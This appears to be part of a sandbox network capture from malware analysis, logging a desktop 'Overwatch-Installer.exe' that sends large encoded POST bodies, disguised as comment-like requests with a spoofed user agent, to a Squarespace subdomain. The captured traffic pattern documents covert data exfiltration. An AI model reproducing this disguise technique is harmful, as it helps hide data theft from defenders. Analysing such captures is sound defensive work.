ZwGkXPwP%2BPpeD41VtUC9frk/HCuTd7L9o4/8sKDsYX2YSIwxgWl7KapEPKOkMNW1rybNiObNuprf6%2BeHNTN2N0WavNyHYGhpC3%2BpxP/szadxdf6XNG7bD6h5fpmcLesOmc8inkSiUqpSGJpU6v5wt6Ec9u3czcjVi4qvq5/RrTHWy51PGSSrForvA%2BphIWvAtfo9hM6kIjWMwpPTkTGjgLGL5g/aY9LLj5YBqaEVswcNe3H0ud2rWeD
2024-09-01 20:04:25 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:24 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BfA0gT8qp0kfYmIwNjc5YWE0N2FmOTFhNjQ0OTk3ZjMxZjliMDYy; Path=/; Secure Set-Cookie: crumb=BQkqUgggQg9cNzY2OTY5OTdkYjNlODkwYmYyYjgzYTdjMjc2Yjkw; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: E0BLWe1S/mqmbp7xH Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BQkqUgggQg9cNzY2OTY5OTdkYjNlODkwYmYyYjgzYTdjMjc2Yjkw"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	49740	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:25 UTC	296	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 108468 Expect: 100-continue
2024-09-01 20:04:25 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:25 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:25 UTC	16306	OUT	Data Raw: 3d 74 51 73 50 33 36 39 66 25 32 42 69 79 58 52 5a 72 43 6b 38 55 6b 4b 76 6b 6c 2f 75 59 59 65 44 6f 4a 4c 73 65 7a 4d 53 2f 6d 6d 48 6a 55 42 71 7a 61 5a 58 52 6e 36 44 71 52 78 6d 7a 64 56 44 50 47 64 79 2f 70 37 79 71 69 6a 4a 30 4c 44 73 4d 5a 5a 52 53 34 6e 33 71 41 6b 6b 36 39 32 48 69 39 45 62 38 57 4d 7a 45 6c 67 69 44 37 72 47 59 5a 74 63 48 64 37 51 67 56 79 73 79 67 43 2f 6a 6d 65 39 33 39 75 54 46 51 41 6d 6e 51 4d 72 6b 4c 70 74 31 57 4f 46 6a 76 67 38 73 52 45 52 78 35 42 42 35 66 56 75 41 49 56 64 61 65 4b 31 6b 75 64 6f 54 4a 54 65 49 6d 44 39 58 6e 50 6f 39 72 6e 6b 6d 44 48 56 4b 52 46 6d 25 32 42 4c 61 39 6a 78 34 4a 69 58 36 7a 57 77 38 50 32 37 48 48 34 47 41 6c 53 59 69 78 53 48 2f 7a 41 7a 53 78 32 5a 71 6e 50 6f 62 6d 37 4d 54 4c Data Ascii: =tQsP369f%2BiyXRZrCk8UkKvkl/uYYeDoJLsezMS/mmHjUBqzaZXRn6DqRxmzdVDPGdy/p7yqijJ0LDsMZZRS4n3qAkk692Hi9Eb8WMzElgiD7rGYZtcHd7QgVysygC/jme939uTFQAmnQMrkLpt1WOFjvg8sRERx5BB5fVuAIVdaeK1kudoTJTeImD9XnPo9rnkmDHVKRFm%2BLa9jx4JiX6zWw8P27HH4GAlSYixSH/zAzSx2ZqnPobm7MTL
2024-09-01 20:04:25 UTC	1	OUT	Data Raw: 35 Data Ascii: 5
2024-09-01 20:04:25 UTC	16306	OUT	Data Raw: 25 32 42 66 64 49 73 63 65 6d 35 44 74 6c 56 6c 78 55 4c 67 55 50 75 69 76 66 45 4d 76 75 56 4b 76 79 75 30 70 25 32 42 25 32 42 41 74 48 31 6f 39 67 25 32 42 79 79 4f 62 37 61 63 46 4a 68 30 54 62 47 63 51 74 71 56 4b 53 51 68 78 66 48 66 61 42 34 45 6a 4e 79 57 32 67 56 51 65 6c 54 6e 34 45 56 6b 32 66 4b 59 46 48 2f 65 65 6e 68 58 4e 43 7a 54 44 74 61 41 66 72 33 78 52 64 54 74 4c 67 34 68 6b 68 61 35 6f 5a 45 59 77 4b 53 4d 43 53 66 4b 4a 34 41 32 64 73 42 35 49 33 7a 4e 32 75 79 76 37 39 46 32 56 42 43 37 57 63 47 62 31 36 41 71 44 32 61 30 54 75 2f 6f 6a 6f 6b 71 4f 38 45 42 64 74 36 72 43 30 4d 4c 25 32 42 4c 4b 53 57 5a 71 53 37 31 7a 4a 32 65 52 77 42 71 42 75 6e 79 65 59 4a 67 51 36 67 76 76 70 6c 63 6c 6c 47 33 32 31 58 6c 5a 25 32 42 43 4d 53 Data Ascii: %2BfdIscem5DtlVlxULgUPuivfEMvuVKvyu0p%2B%2BAtH1o9g%2ByyOb7acFJh0TbGcQtqVKSQhxfHfaB4EjNyW2gVQelTn4EVk2fKYFH/eenhXNCzTDtaAfr3xRdTtLg4hkha5oZEYwKSMCSfKJ4A2dsB5I3zN2uyv79F2VBC7WcGb16AqD2a0Tu/ojokqO8EBdt6rC0ML%2BLKSWZqS71zJ2eRwBqBunyeYJgQ6gvvplcllG321XlZ%2BCMS
2024-09-01 20:04:25 UTC	1	OUT	Data Raw: 37 Data Ascii: 7
2024-09-01 20:04:25 UTC	16306	OUT	Data Raw: 48 78 56 72 76 37 70 74 55 6b 33 34 68 35 72 71 6e 42 72 6c 65 78 38 56 61 37 25 32 42 36 62 4e 59 46 73 71 62 73 63 72 64 6f 78 33 30 6d 7a 42 61 34 63 45 4f 46 67 4d 71 4b 55 34 4b 71 76 69 57 53 44 7a 35 36 30 71 50 33 4a 54 66 72 53 67 72 53 65 37 6c 31 6e 61 39 63 4d 45 39 47 67 30 48 34 6f 34 54 31 67 4f 31 25 32 42 54 4e 54 75 25 32 42 76 5a 39 70 25 32 42 67 52 75 47 53 70 53 52 5a 46 59 45 71 6b 73 6f 4e 65 62 46 64 62 4d 73 35 57 50 30 6a 4d 69 64 54 32 72 32 4f 62 2f 50 59 72 73 4c 36 6f 4e 7a 4f 6f 61 75 61 6d 37 41 4d 34 65 49 6c 66 47 61 64 46 69 64 78 4a 70 32 78 4c 4b 42 41 66 4f 41 79 69 67 49 70 62 68 7a 4e 54 44 4a 5a 49 67 7a 36 48 44 56 69 5a 52 77 4b 76 48 32 30 71 46 4f 46 68 35 55 37 6b 25 32 42 56 34 36 45 75 53 6a 4d 74 73 53 72 Data Ascii: HxVrv7ptUk34h5rqnBrlex8Va7%2B6bNYFsqbscrdox30mzBa4cEOFgMqKU4KqviWSDz560qP3JTfrSgrSe7l1na9cME9Gg0H4o4T1gO1%2BTNTu%2BvZ9p%2BgRuGSpSRZFYEqksoNebFdbMs5WP0jMidT2r2Ob/PYrsL6oNzOoauam7AM4eIlfGadFidxJp2xLKBAfOAyigIpbhzNTDJZIgz6HDViZRwKvH20qFOFh5U7k%2BV46EuSjMtsSr
2024-09-01 20:04:25 UTC	1	OUT	Data Raw: 4d Data Ascii: M
2024-09-01 20:04:25 UTC	16306	OUT	Data Raw: 4f 47 38 56 72 54 38 79 44 6b 77 4e 42 59 31 61 34 56 64 4a 65 43 5a 77 32 32 6e 25 32 42 53 4a 74 72 6c 47 72 72 6e 74 53 66 34 6d 4e 4f 55 41 36 65 47 53 38 69 33 6c 49 4c 76 4f 32 6a 38 4a 62 69 69 4e 6b 48 64 4f 6d 79 44 59 43 43 33 6b 6a 71 48 32 57 31 65 6a 57 25 32 42 55 33 50 64 49 77 65 51 6f 64 69 70 44 7a 38 50 59 36 49 47 37 39 4f 69 4b 75 73 51 6b 39 34 6a 5a 74 32 51 6c 79 45 31 33 34 43 71 38 4f 75 47 63 6b 56 47 49 34 78 53 72 39 56 79 6c 53 48 74 34 31 68 64 33 58 6e 61 65 65 4b 38 54 4b 53 77 6e 73 35 6e 50 67 74 38 5a 47 59 38 32 36 68 5a 4a 35 68 49 32 4b 6c 38 66 4f 42 64 7a 31 34 34 77 47 63 69 46 25 32 42 63 46 78 64 39 2f 48 72 55 70 44 49 77 63 2f 61 41 41 6a 56 47 62 38 6e 4b 49 5a 56 77 42 43 31 33 53 46 37 6c 50 74 65 66 45 37 Data Ascii: OG8VrT8yDkwNBY1a4VdJeCZw22n%2BSJtrlGrrntSf4mNOUA6eGS8i3lILvO2j8JbiiNkHdOmyDYCC3kjqH2W1ejW%2BU3PdIweQodipDz8PY6IG79OiKusQk94jZt2QlyE134Cq8OuGckVGI4xSr9VylSHt41hd3XnaeeK8TKSwns5nPgt8ZGY826hZJ5hI2Kl8fOBdz144wGciF%2BcFxd9/HrUpDIwc/aAAjVGb8nKIZVwBC13SF7lPtefE7
2024-09-01 20:04:25 UTC	1	OUT	Data Raw: 36 Data Ascii: 6
2024-09-01 20:04:25 UTC	16306	OUT	Data Raw: 5a 77 47 6b 58 50 77 50 25 32 42 50 70 65 44 34 31 56 74 55 43 39 66 72 6b 2f 48 43 75 54 64 37 4c 39 6f 34 2f 38 73 4b 44 73 59 58 32 59 53 49 77 78 67 57 6c 37 4b 61 70 45 50 4b 4f 6b 4d 4e 57 31 72 79 62 4e 69 4f 62 4e 75 70 72 66 36 25 32 42 65 48 4e 54 4e 32 4e 30 57 61 76 4e 79 48 59 47 68 70 43 33 25 32 42 70 78 50 2f 73 7a 61 64 78 64 66 36 58 4e 47 37 62 44 36 68 35 66 70 6d 63 4c 65 73 4f 6d 63 38 69 6e 6b 53 69 55 71 70 53 47 4a 70 55 36 76 35 77 74 36 45 63 39 75 33 63 7a 63 6a 56 69 34 71 76 71 35 2f 52 72 54 48 57 79 35 31 50 47 53 53 72 46 6f 72 76 41 25 32 42 70 68 49 57 76 41 74 66 6f 39 68 4d 36 6b 49 6a 57 4d 77 70 50 54 6b 54 47 6a 67 4c 47 4c 35 67 2f 61 59 39 4c 4c 6a 35 59 42 71 61 45 56 73 77 63 4e 65 33 48 30 75 64 32 72 57 65 44 Data Ascii: ZwGkXPwP%2BPpeD41VtUC9frk/HCuTd7L9o4/8sKDsYX2YSIwxgWl7KapEPKOkMNW1rybNiObNuprf6%2BeHNTN2N0WavNyHYGhpC3%2BpxP/szadxdf6XNG7bD6h5fpmcLesOmc8inkSiUqpSGJpU6v5wt6Ec9u3czcjVi4qvq5/RrTHWy51PGSSrForvA%2BphIWvAtfo9hM6kIjWMwpPTkTGjgLGL5g/aY9LLj5YBqaEVswcNe3H0ud2rWeD
2024-09-01 20:04:25 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:25 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=Beqjhu2V9b67ODlkMmQ5M2I3ZDBjZjY2YzkxOWZlYTFlMDFlNzcx; Path=/; Secure Set-Cookie: crumb=BYal7aeUhzGNZjBjY2JiMWViOTcyYjc2MjI5YWRjMWFlZjIzODhk; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: OcUEGvb4/oyhwWPTZ Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BYal7aeUhzGNZjBjY2JiMWViOTcyYjc2MjI5YWRjMWFlZjIzODhk"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.5	49741	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:25 UTC	296	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 108468 Expect: 100-continue
2024-09-01 20:04:25 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:25 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:25 UTC	16306	OUT	Data Raw: 3d 74 51 73 50 33 36 39 66 25 32 42 69 79 58 52 5a 72 43 6b 38 55 6b 4b 76 6b 6c 2f 75 59 59 65 44 6f 4a 4c 73 65 7a 4d 53 2f 6d 6d 48 6a 55 42 71 7a 61 5a 58 52 6e 36 44 71 52 78 6d 7a 64 56 44 50 47 64 79 2f 70 37 79 71 69 6a 4a 30 4c 44 73 4d 5a 5a 52 53 34 6e 33 71 41 6b 6b 36 39 32 48 69 39 44 44 5a 57 36 65 74 44 43 6d 51 64 65 52 43 46 43 49 79 4f 62 41 67 56 79 73 79 67 43 2f 6a 6d 65 39 33 39 75 54 46 51 41 6d 6e 51 4d 72 6b 4c 70 74 31 57 4f 46 6a 76 67 38 73 52 45 52 78 35 42 42 35 66 56 75 41 49 56 64 61 65 4b 31 6b 75 64 6f 54 4a 54 65 49 6d 44 39 58 6e 50 6f 39 72 6e 6b 6d 44 48 56 4b 52 46 6d 25 32 42 4c 61 39 6a 78 34 4a 69 58 36 7a 57 77 38 50 32 37 48 48 34 47 41 6c 53 59 69 78 53 48 2f 7a 41 7a 53 78 32 5a 71 6e 50 6f 62 6d 37 4d 54 4c Data Ascii: =tQsP369f%2BiyXRZrCk8UkKvkl/uYYeDoJLsezMS/mmHjUBqzaZXRn6DqRxmzdVDPGdy/p7yqijJ0LDsMZZRS4n3qAkk692Hi9DDZW6etDCmQdeRCFCIyObAgVysygC/jme939uTFQAmnQMrkLpt1WOFjvg8sRERx5BB5fVuAIVdaeK1kudoTJTeImD9XnPo9rnkmDHVKRFm%2BLa9jx4JiX6zWw8P27HH4GAlSYixSH/zAzSx2ZqnPobm7MTL
2024-09-01 20:04:25 UTC	1	OUT	Data Raw: 35 Data Ascii: 5
2024-09-01 20:04:25 UTC	16306	OUT	Data Raw: 25 32 42 66 64 49 73 63 65 6d 35 44 74 6c 56 6c 78 55 4c 67 55 50 75 69 76 66 45 4d 76 75 56 4b 76 79 75 30 70 25 32 42 25 32 42 41 74 48 31 6f 39 67 25 32 42 79 79 4f 62 37 61 63 46 4a 68 30 54 62 47 63 51 74 71 56 4b 53 51 68 78 66 48 66 61 42 34 45 6a 4e 79 57 32 67 56 51 65 6c 54 6e 34 45 56 6b 32 66 4b 59 46 48 2f 65 65 6e 68 58 4e 43 7a 54 44 74 61 41 66 72 33 78 52 64 54 74 4c 67 34 68 6b 68 61 35 6f 5a 45 59 77 4b 53 4d 43 53 66 4b 4a 34 41 32 64 73 42 35 49 33 7a 4e 32 75 79 76 37 39 46 32 56 42 43 37 57 63 47 62 31 36 41 71 44 32 61 30 54 75 2f 6f 6a 6f 6b 71 4f 38 45 42 64 74 36 72 43 30 4d 4c 25 32 42 4c 4b 53 57 5a 71 53 37 31 7a 4a 32 65 52 77 42 71 42 75 6e 79 65 59 4a 67 51 36 67 76 76 70 6c 63 6c 6c 47 33 32 31 58 6c 5a 25 32 42 43 4d 53 Data Ascii: %2BfdIscem5DtlVlxULgUPuivfEMvuVKvyu0p%2B%2BAtH1o9g%2ByyOb7acFJh0TbGcQtqVKSQhxfHfaB4EjNyW2gVQelTn4EVk2fKYFH/eenhXNCzTDtaAfr3xRdTtLg4hkha5oZEYwKSMCSfKJ4A2dsB5I3zN2uyv79F2VBC7WcGb16AqD2a0Tu/ojokqO8EBdt6rC0ML%2BLKSWZqS71zJ2eRwBqBunyeYJgQ6gvvplcllG321XlZ%2BCMS
2024-09-01 20:04:25 UTC	1	OUT	Data Raw: 37 Data Ascii: 7
2024-09-01 20:04:25 UTC	16306	OUT	Data Raw: 48 78 56 72 76 37 70 74 55 6b 33 34 68 35 72 71 6e 42 72 6c 65 78 38 56 61 37 25 32 42 36 62 4e 59 46 73 71 62 73 63 72 64 6f 78 33 30 6d 7a 42 61 34 63 45 4f 46 67 4d 71 4b 55 34 4b 71 76 69 57 53 44 7a 35 36 30 71 50 33 4a 54 66 72 53 67 72 53 65 37 6c 31 6e 61 39 63 4d 45 39 47 67 30 48 34 6f 34 54 31 67 4f 31 25 32 42 54 4e 54 75 25 32 42 76 5a 39 70 25 32 42 67 52 75 47 53 70 53 52 5a 46 59 45 71 6b 73 6f 4e 65 62 46 64 62 4d 73 35 57 50 30 6a 4d 69 64 54 32 72 32 4f 62 2f 50 59 72 73 4c 36 6f 4e 7a 4f 6f 61 75 61 6d 37 41 4d 34 65 49 6c 66 47 61 64 46 69 64 78 4a 70 32 78 4c 4b 42 41 66 4f 41 79 69 67 49 70 62 68 7a 4e 54 44 4a 5a 49 67 7a 36 48 44 56 69 5a 52 77 4b 76 48 32 30 71 46 4f 46 68 35 55 37 6b 25 32 42 56 34 36 45 75 53 6a 4d 74 73 53 72 Data Ascii: HxVrv7ptUk34h5rqnBrlex8Va7%2B6bNYFsqbscrdox30mzBa4cEOFgMqKU4KqviWSDz560qP3JTfrSgrSe7l1na9cME9Gg0H4o4T1gO1%2BTNTu%2BvZ9p%2BgRuGSpSRZFYEqksoNebFdbMs5WP0jMidT2r2Ob/PYrsL6oNzOoauam7AM4eIlfGadFidxJp2xLKBAfOAyigIpbhzNTDJZIgz6HDViZRwKvH20qFOFh5U7k%2BV46EuSjMtsSr
2024-09-01 20:04:25 UTC	1	OUT	Data Raw: 4d Data Ascii: M
2024-09-01 20:04:25 UTC	16306	OUT	Data Raw: 4f 47 38 56 72 54 38 79 44 6b 77 4e 42 59 31 61 34 56 64 4a 65 43 5a 77 32 32 6e 25 32 42 53 4a 74 72 6c 47 72 72 6e 74 53 66 34 6d 4e 4f 55 41 36 65 47 53 38 69 33 6c 49 4c 76 4f 32 6a 38 4a 62 69 69 4e 6b 48 64 4f 6d 79 44 59 43 43 33 6b 6a 71 48 32 57 31 65 6a 57 25 32 42 55 33 50 64 49 77 65 51 6f 64 69 70 44 7a 38 50 59 36 49 47 37 39 4f 69 4b 75 73 51 6b 39 34 6a 5a 74 32 51 6c 79 45 31 33 34 43 71 38 4f 75 47 63 6b 56 47 49 34 78 53 72 39 56 79 6c 53 48 74 34 31 68 64 33 58 6e 61 65 65 4b 38 54 4b 53 77 6e 73 35 6e 50 67 74 38 5a 47 59 38 32 36 68 5a 4a 35 68 49 32 4b 6c 38 66 4f 42 64 7a 31 34 34 77 47 63 69 46 25 32 42 63 46 78 64 39 2f 48 72 55 70 44 49 77 63 2f 61 41 41 6a 56 47 62 38 6e 4b 49 5a 56 77 42 43 31 33 53 46 37 6c 50 74 65 66 45 37 Data Ascii: OG8VrT8yDkwNBY1a4VdJeCZw22n%2BSJtrlGrrntSf4mNOUA6eGS8i3lILvO2j8JbiiNkHdOmyDYCC3kjqH2W1ejW%2BU3PdIweQodipDz8PY6IG79OiKusQk94jZt2QlyE134Cq8OuGckVGI4xSr9VylSHt41hd3XnaeeK8TKSwns5nPgt8ZGY826hZJ5hI2Kl8fOBdz144wGciF%2BcFxd9/HrUpDIwc/aAAjVGb8nKIZVwBC13SF7lPtefE7
2024-09-01 20:04:25 UTC	1	OUT	Data Raw: 36 Data Ascii: 6
2024-09-01 20:04:25 UTC	16306	OUT	Data Raw: 5a 77 47 6b 58 50 77 50 25 32 42 50 70 65 44 34 31 56 74 55 43 39 66 72 6b 2f 48 43 75 54 64 37 4c 39 6f 34 2f 38 73 4b 44 73 59 58 32 59 53 49 77 78 67 57 6c 37 4b 61 70 45 50 4b 4f 6b 4d 4e 57 31 72 79 62 4e 69 4f 62 4e 75 70 72 66 36 25 32 42 65 48 4e 54 4e 32 4e 30 57 61 76 4e 79 48 59 47 68 70 43 33 25 32 42 70 78 50 2f 73 7a 61 64 78 64 66 36 58 4e 47 37 62 44 36 68 35 66 70 6d 63 4c 65 73 4f 6d 63 38 69 6e 6b 53 69 55 71 70 53 47 4a 70 55 36 76 35 77 74 36 45 63 39 75 33 63 7a 63 6a 56 69 34 71 76 71 35 2f 52 72 54 48 57 79 35 31 50 47 53 53 72 46 6f 72 76 41 25 32 42 70 68 49 57 76 41 74 66 6f 39 68 4d 36 6b 49 6a 57 4d 77 70 50 54 6b 54 47 6a 67 4c 47 4c 35 67 2f 61 59 39 4c 4c 6a 35 59 42 71 61 45 56 73 77 63 4e 65 33 48 30 75 64 32 72 57 65 44 Data Ascii: ZwGkXPwP%2BPpeD41VtUC9frk/HCuTd7L9o4/8sKDsYX2YSIwxgWl7KapEPKOkMNW1rybNiObNuprf6%2BeHNTN2N0WavNyHYGhpC3%2BpxP/szadxdf6XNG7bD6h5fpmcLesOmc8inkSiUqpSGJpU6v5wt6Ec9u3czcjVi4qvq5/RrTHWy51PGSSrForvA%2BphIWvAtfo9hM6kIjWMwpPTkTGjgLGL5g/aY9LLj5YBqaEVswcNe3H0ud2rWeD
2024-09-01 20:04:25 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:25 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BSqYHOl_tzMZZTdkNTZkOGE0NjU1NDEyZDUxOTU4N2M5NmIxMDQ0; Path=/; Secure Set-Cookie: crumb=BZiodlpFcLz6MzBlNzdiYzJjMmVhNzdiMTU2ZDM3ZjliMTFmZTkx; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: wOzlmHzh/0uC8lK7U Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BZiodlpFcLz6MzBlNzdiYzJjMmVhNzdiMTU2ZDM3ZjliMTFmZTkx"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.5	49742	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:26 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:04:26 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:26 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:26 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:04:26 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:26 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=Bfm-zwugn5DPZjdmNmI0YzAxOTU5NGIwNjk3YWU2MDYxNmU3YzIy; Path=/; Secure Set-Cookie: crumb=Bc6O4ROCfTZXN2QyNDA0MTNjYmI0MTgzYzdkMmI1OTg1YTRiNTlm; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: HLXNybkQ/0RLVW1Xa Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"Bc6O4ROCfTZXN2QyNDA0MTNjYmI0MTgzYzdkMmI1OTg1YTRiNTlm"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.5	49743	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:26 UTC	296	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 108468 Expect: 100-continue
2024-09-01 20:04:26 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:26 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:26 UTC	16306	OUT	Data Raw: 3d 74 51 73 50 33 36 39 66 25 32 42 69 79 58 52 5a 72 43 6b 38 55 6b 4b 76 6b 6c 2f 75 59 59 65 44 6f 4a 4c 73 65 7a 4d 53 2f 6d 6d 48 6a 55 42 71 7a 61 5a 58 52 6e 36 44 71 52 78 6d 7a 64 56 44 50 47 64 79 2f 70 37 79 71 69 6a 4a 30 4c 44 73 4d 5a 5a 52 53 34 6e 33 71 41 6b 6b 36 39 32 48 69 39 44 44 5a 57 36 65 74 44 43 6d 51 53 63 77 4d 42 4c 41 6c 75 39 77 67 56 79 73 79 67 43 2f 6a 6d 65 39 33 39 75 54 46 51 41 6d 6e 51 4d 72 6b 4c 70 74 31 57 4f 46 6a 76 67 38 73 52 45 52 78 35 42 42 35 66 56 75 41 49 56 64 61 65 4b 31 6b 75 64 6f 54 4a 54 65 49 6d 44 39 58 6e 50 6f 39 72 6e 6b 6d 44 48 56 4b 52 46 6d 25 32 42 4c 61 39 6a 78 34 4a 69 58 36 7a 57 77 38 50 32 37 48 48 34 47 41 6c 53 59 69 78 53 48 2f 7a 41 7a 53 78 32 5a 71 6e 50 6f 62 6d 37 4d 54 4c Data Ascii: =tQsP369f%2BiyXRZrCk8UkKvkl/uYYeDoJLsezMS/mmHjUBqzaZXRn6DqRxmzdVDPGdy/p7yqijJ0LDsMZZRS4n3qAkk692Hi9DDZW6etDCmQScwMBLAlu9wgVysygC/jme939uTFQAmnQMrkLpt1WOFjvg8sRERx5BB5fVuAIVdaeK1kudoTJTeImD9XnPo9rnkmDHVKRFm%2BLa9jx4JiX6zWw8P27HH4GAlSYixSH/zAzSx2ZqnPobm7MTL
2024-09-01 20:04:26 UTC	1	OUT	Data Raw: 35 Data Ascii: 5
2024-09-01 20:04:26 UTC	16306	OUT	Data Raw: 25 32 42 66 64 49 73 63 65 6d 35 44 74 6c 56 6c 78 55 4c 67 55 50 75 69 76 66 45 4d 76 75 56 4b 76 79 75 30 70 25 32 42 25 32 42 41 74 48 31 6f 39 67 25 32 42 79 79 4f 62 37 61 63 46 4a 68 30 54 62 47 63 51 74 71 56 4b 53 51 68 78 66 48 66 61 42 34 45 6a 4e 79 57 32 67 56 51 65 6c 54 6e 34 45 56 6b 32 66 4b 59 46 48 2f 65 65 6e 68 58 4e 43 7a 54 44 74 61 41 66 72 33 78 52 64 54 74 4c 67 34 68 6b 68 61 35 6f 5a 45 59 77 4b 53 4d 43 53 66 4b 4a 34 41 32 64 73 42 35 49 33 7a 4e 32 75 79 76 37 39 46 32 56 42 43 37 57 63 47 62 31 36 41 71 44 32 61 30 54 75 2f 6f 6a 6f 6b 71 4f 38 45 42 64 74 36 72 43 30 4d 4c 25 32 42 4c 4b 53 57 5a 71 53 37 31 7a 4a 32 65 52 77 42 71 42 75 6e 79 65 59 4a 67 51 36 67 76 76 70 6c 63 6c 6c 47 33 32 31 58 6c 5a 25 32 42 43 4d 53 Data Ascii: %2BfdIscem5DtlVlxULgUPuivfEMvuVKvyu0p%2B%2BAtH1o9g%2ByyOb7acFJh0TbGcQtqVKSQhxfHfaB4EjNyW2gVQelTn4EVk2fKYFH/eenhXNCzTDtaAfr3xRdTtLg4hkha5oZEYwKSMCSfKJ4A2dsB5I3zN2uyv79F2VBC7WcGb16AqD2a0Tu/ojokqO8EBdt6rC0ML%2BLKSWZqS71zJ2eRwBqBunyeYJgQ6gvvplcllG321XlZ%2BCMS
2024-09-01 20:04:26 UTC	1	OUT	Data Raw: 37 Data Ascii: 7
